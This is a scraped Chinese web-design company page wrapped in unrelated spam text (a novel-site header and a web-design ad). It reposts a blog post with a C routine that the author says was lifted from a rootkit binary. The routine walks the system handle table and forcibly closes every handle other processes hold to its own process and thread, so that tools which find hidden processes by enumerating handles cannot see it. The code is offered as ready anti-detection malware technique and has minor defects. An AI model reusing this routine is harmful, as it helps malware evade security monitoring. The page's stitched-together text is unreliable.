我欲封天耳根小说,小说阅读网站,已完本玄幻小说排行榜

新聞中心

這里有您想知道的互聯(lián)網(wǎng)營(yíng)銷解決方案

抹掉所有進(jìn)程中自己的句柄

創(chuàng)新互聯(lián)服務(wù)項(xiàng)目包括興安網(wǎng)站建設(shè)、興安網(wǎng)站制作、興安網(wǎng)頁(yè)制作以及興安網(wǎng)絡(luò)營(yíng)銷策劃等。多年來(lái)，我們專注于互聯(lián)網(wǎng)行業(yè)，利用自身積累的技術(shù)優(yōu)勢(shì)、行業(yè)經(jīng)驗(yàn)、深度合作伙伴關(guān)系等，向廣大中小型企業(yè)、政府機(jī)構(gòu)等提供互聯(lián)網(wǎng)行業(yè)的解決方案，興安網(wǎng)站推廣取得了明顯的社會(huì)效益與經(jīng)濟(jì)效益。目前，我們服務(wù)的客戶以成都為中心已經(jīng)輻射到興安省份的部分城市，未來(lái)相信會(huì)繼續(xù)擴(kuò)大服務(wù)區(qū)域并繼續(xù)獲得客戶的支持與信任！

之前聽(tīng)過(guò)一個(gè)檢測(cè)進(jìn)程的想法，就是暴力枚舉所有進(jìn)程中的handle,查找其中類型為PROCESS的．

此法也被爐子牛用于他的LzOpenProcess()．

下面我就寫了一斷代碼來(lái)對(duì)抗這個(gè)方法，純屬小伎倆，牛牛們飄過(guò)～

嚴(yán)格說(shuō)，此段代碼不算原創(chuàng)，是從某rootkit的bin中扒出來(lái)的，因此基本保留其原貌，經(jīng)我修改測(cè)試，主要函數(shù)如下：

void CloseAllmyHandles() 
{ 
   
  HANDLE hCurProcess,hSouceProcessHandle,hTargetHandle; 
  HANDLE hMyProcess=INVALID_HANDLE_VALUE,hMyThread=INVALID_HANDLE_VALUE; 
  DWORD pid,nBufferLen=0x40000,nRetnLen=0; 
  DWORD HandleCnt,NumberOfHandles; 
  DWORD pMyProcessObject = 0,pMyThreadObject = 0,pObject; 
  CLIENT_ID myCid,tmpCid; 
  PVOID pBuffer = NULL; 
  NTSTATUS status; 
  OBJECT_ATTRIBUTES  ObjectAttributes; 
  myCid.UniqueProcess =(HANDLE)my_GetProcessId(); 
  myCid.UniqueThread=(HANDLE)my_GetThreadId(); 
  InitializeObjectAttributes( &ObjectAttributes, NULL, 0, NULL, NULL ); 
  ZwOpenProcess(&hMyProcess, PROCESS_ALL_ACCESS, &ObjectAttributes, &myCid); 
  ZwOpenThread(&hMyThread, PROCESS_ALL_ACCESS, &ObjectAttributes, &myCid); 
  printf("hMyProcess:0x%08x\n",hMyProcess); 
  printf("hMyThread :0x%08x\n",hMyThread); 
  hCurProcess = GetCurrentProcess(); 
  status=ZwAllocateVirtualMemory(hCurProcess, &pBuffer, 0, &nBufferLen, MEM_COMMIT,PAGE_READWRITE); 
  if (!NT_SUCCESS(status)) 
  { 
    printf("Alloc Memory failed.\n"); 
    return; 
  } 
  printf("Alloced Buffer:0x%08X\n",pBuffer); 
  ZwQuerySystemInformation(SystemHandleInformation, pBuffer, nBufferLen, &nRetnLen);// 16=SystemHandleInformation 
  printf("Searching handles...\n"); 
  HandleCnt=*(DWORD *)pBuffer; 
  printf("Handle Count:%d\n",HandleCnt); 
  if (HandleCnt>1) 
  { 
    NumberOfHandles=*(DWORD*)pBuffer; 
    pHandleInfo=(PSYSTEM_HANDLE_TABLE_ENTRY_INFO)((char*)pBuffer+sizeof(DWORD)); 
    do 
    {                                                 
      //printf("HandleValue:0x%08X\n",pHandleInfo->HandleValue); 
      if ( pHandleInfo->HandleValue==(USHORT)hMyThread ) 
    { 
        if (pHandleInfo->UniqueProcessId == (USHORT)myCid.UniqueProcess ) 
        { 
          pMyThreadObject = *(DWORD*)&(pHandleInfo->Object); 
          printf("Thread  finded\n"); 
        } 
      } 
      if (pHandleInfo->HandleValue==(USHORT)hMyProcess ) 
      { 
        if (pHandleInfo->UniqueProcessId == (USHORT)myCid.UniqueProcess) 
        { 
          pMyProcessObject =*(DWORD*)&(pHandleInfo->Object); 
          printf("Process finded\n"); 
        } 
      } 
      ++pHandleInfo; 
      --NumberOfHandles; 
     
    } 
    while ( NumberOfHandles ); 
  } 
  ZwClose(hMyThread); 
  ZwClose(hMyProcess); 
  printf("Found my object ok.\nBegin Search and Close...\n"); 
  NumberOfHandles=HandleCnt; 
  if (HandleCnt>=1 ) 
  { 
　　pHandleInfo=(PSYSTEM_HANDLE_TABLE_ENTRY_INFO)((char*)pBuffer+sizeof(DWORD)); 
    do 
    { 
      pObject = *(DWORD*)&(pHandleInfo->Object); 
     
      if ( pMyProcessObject == pObject || pMyThreadObject == pObject ) 
      { 
        printf("Found Handle=0x%08X OwnerPID=%4d\n",pHandleInfo->HandleValue,pHandleInfo->UniqueProcessId); 
      tmpCid.UniqueProcess= (HANDLE)pHandleInfo->UniqueProcessId; 
      tmpCid.UniqueThread=0; 
      InitializeObjectAttributes(&ObjectAttributes, NULL, 0, NULL, NULL ); 
      status=ZwOpenProcess(&hSouceProcessHandle, PROCESS_DUP_HANDLE, &ObjectAttributes, &tmpCid); 
        //PrintZwError("ZwOpenProcess",status); 
        if (!status) 
        { 
    status=ZwDuplicateObject( 
            hSouceProcessHandle, 
            (void*)pHandleInfo->HandleValue, 
            hCurProcess, 
            &hTargetHandle, 
            0, 
            0, 
                DUPLICATE_CLOSE_SOURCE); 

  if ( !status) 
          { 
            ZwClose(hTargetHandle); 
            printf("Handle closed!\n"); 
          } 
      //PrintZwError("ZwDuplicateObject",status); 
          ZwClose(hSouceProcessHandle); 
        } 
      } 
      ++pHandleInfo; 
      --NumberOfHandles; 
    } 
    while ( NumberOfHandles ); 
  } 
  ZwFreeVirtualMemory(hCurProcess, &pBuffer, &nBufferLen, MEM_RELEASE); 
}

新聞名稱：抹掉所有進(jìn)程中自己的句柄
文章起源：http://fisionsoft.com.cn/article/dhpgdhi.html

新聞中心

其他資訊